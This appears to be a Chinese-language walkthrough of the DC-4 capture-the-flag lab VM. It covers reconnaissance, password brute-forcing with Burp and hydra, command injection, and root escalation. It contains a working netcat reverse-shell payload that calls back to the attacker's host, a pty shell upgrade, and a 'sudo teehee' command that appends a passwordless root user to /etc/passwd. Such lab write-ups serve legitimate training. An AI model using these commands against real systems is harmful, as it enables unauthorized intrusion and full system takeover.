1.靶场搭建
镜像地址:https://www.five86.com/dc-4.html
Kali ip :192.168.1.162
目标主机:192.168.1.105
然后导入Vmware即可。
2.信息搜集
用 arp-scan -l 扫描同网段的其他IP地址,从而得到目的主机的IP。
端口信息搜集
使用到 nmap进行端口信息的搜集;
nmap -A -sV 192.168.1.105
可见,该主机开启了80,22端口,对应http服务和ssh服务。
3.漏洞利用
在浏览器中访问 192.168.1.105 ;浏览器页面会产生响应。
是一个后台管理登录的弹框,用户名就是admin;因此,此处需要爆破出admin账号的密码。
最后,用burp的测试模块功能,使用字典爆破出密码为 happy。
于是,账号:admin;吗,密码:happy,就可登录后台。
登录后台,发现是一个可以执行命令的选项功能窗口。
根据以往经验,由于存在命令执行,便可在此处进行shell反弹;
抓包,修改数据;
radio=nc 192.168.1.162 1234 -e /bin/bash&submit=Run
修改之后,并且监听端口,nc -lvvp 1234;反弹shell
然后用python打开一个标准的shell;这点不清楚为什么要这样说!
python -c 'import pty;pty.spawn("/bin/bash")'
切换到home目录下,查看用户信息;
ps:中途有错误,请忽略!
在这个目录下,存在一个.bak后缀的文件,这个是一个备份文件。
继续打开,是一些简单的经典密码;
将以上历史密码保存下来,用户名为jim;开始ssh的爆破。
得到用户名为 jim;密码为: jibril04;进行ssh登录;
登录成功,并且提示 you have mail;肯定有猫腻。
su root 无法进行权限的提升,提示密码错误。
果不其然,找到了这个秘密!
提权
切换用户为 charles;
可以看到,teehee可以不使用密码就进行命令的执行;不妨试一试以这个来提权,前面也用到了docker进行提权,这个应该也可以。
查看帮助:
使用命令可以将标准输入写入到指定文件中(以root权限写入文件内容);
既然可以以root权限写入任意文件信息,那么我们就可以利用各种骚操作进行提权了;
eg. 在 /etc/passwd/ 下写入一个具有 root 权限的新用户。
sudo teehee -aa /etc/passwd
aa::0:0:root:/root:/bin/bash
总结:
1.使用teehee进行提权
2.hydra 工具爆破